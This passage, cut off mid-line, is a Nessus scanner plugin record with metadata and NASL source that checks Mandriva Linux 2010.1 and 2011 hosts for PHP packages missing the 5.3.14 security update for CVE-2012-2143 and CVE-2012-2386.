(MDVSA-2012:093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2386", "CVE-2012-2143"], "modified": "2012-06-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-sqlite3", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ini", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-sybase_ct", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:php-fpm", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-phar", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-doc", "p-cpe:/a:mandriva:linux:php-enchant", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-mysqlnd", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-intl", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2012-093.NASL", "href": "https://www.tenable.com/plugins/nessus/59519", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:093. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59519);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2143\", \"CVE-2012-2386\");\n script_bugtraq_id(47545, 53729);\n script_xref(name:\"MDVSA\", value:\"2012:093\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2012:093)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been identified and fixed in php :\n\nThere is a programming error in the DES implementation used in crypt()\nin ext/standard/crypt_freesec.c when handling input which contains\ncharacters that can not be represented with 7-bit ASCII. When the\ninput contains characters with only the most significant bit set\n(0x80), that character and all characters after it will be ignored\n(CVE-2012-2143).\n\nAn integer overflow, leading to heap-based buffer overflow was found\nin the way Phar extension of the PHP scripting language processed\ncertain fields by manipulating TAR files. A remote attacker could\nprovide a specially crafted TAR archive file, which once processed in\nan PHP application using the Phar extension could lead to denial of\nservice (application crash), or, potentially arbitary code execution\nwith the privileges of the user running the application\n(CVE-2012-2386).\n\nThe updated php packages have been upgraded to the 5.3.14 version\nwhich is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secuniaresearch.flexerasoftware.com/advisories/44335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.14\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase_ct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_php-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libphp5_common5-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-bcmath-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-bz2-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-calendar-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-cgi-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-cli-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ctype-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-curl-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-dba-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-devel-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-doc-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-dom-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-enchant-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-exif-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-fileinfo-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-filter-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-fpm-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ftp-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gd-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gettext-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gmp-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-hash-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-iconv-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-imap-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ini-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-intl-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-json-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ldap-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mbstring-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mcrypt-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mssql-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mysql-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mysqli-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mysqlnd-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-odbc-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-openssl-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pcntl-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_dblib-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_mysql-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_odbc-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_pgsql-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_sqlite-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pgsql-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-phar-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-posix-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pspell-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-readline-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-recode-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-session-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-shmop-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-snmp-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-soap-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sockets-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sqlite-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sqlite3-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sybase_ct-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvmsg-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvsem-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvshm-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-tidy-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-tokenizer-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-wddx-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xml-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlreader-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlrpc-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlwriter-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xsl-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-zip-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-zlib-5.3.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_php-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libphp5_common5-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-bcmath-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-bz2-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-calendar-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-cgi-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-cli-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-ctype-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-curl-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-dba-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-devel-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-doc-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-dom-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-enchant-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-exif-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-fileinfo-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-filter-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-fpm-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-ftp-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-gd-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-gettext-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-gmp-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-hash-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-iconv-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-imap-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-ini-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-intl-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-json-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-ldap-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mbstring-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mcrypt-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mssql-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mysql-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mysqli-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-mysqlnd-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-odbc-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-openssl-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"php-pcntl-5.3.14-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", 